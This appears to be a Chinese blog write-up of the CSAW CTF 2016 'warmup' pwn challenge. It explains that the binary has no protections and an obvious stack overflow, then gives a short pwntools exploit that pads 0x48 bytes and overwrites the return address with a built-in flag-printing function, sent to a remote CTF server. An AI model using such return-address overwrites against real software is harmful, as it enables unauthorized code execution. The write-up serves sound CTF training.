美文网首页
攻防世界 warmup wp (csaw-ctf-2016-qu

攻防世界 warmup wp (csaw-ctf-2016-qu

作者: 111p1kk | 来源:发表于2019-08-02 23:32 被阅读0次

    额...攻防世界没有提供附件,我去网上找了找附件


    checksec 什么保护都没有开ovo
    ida 存在很明显的栈溢出


    这个sub_40060D就是自带了cat flag的函数。。。

    这怎么能算是进阶呢。。。

    EXP如下

    #!usr/bin/python
    
    from pwn import *
    
    io = remote("111.198.29.45", 33575)
    # io = process("./warmup")
    
    payload = "a" * 0x40 + "a" * 8 + p64(0x40060D)
    
    io.sendline(payload)
    
    io.interactive()
    

    相关文章

      网友评论

          本文标题:攻防世界 warmup wp (csaw-ctf-2016-qu

          本文链接:https://www.haomeiwen.com/subject/fyhddctx.html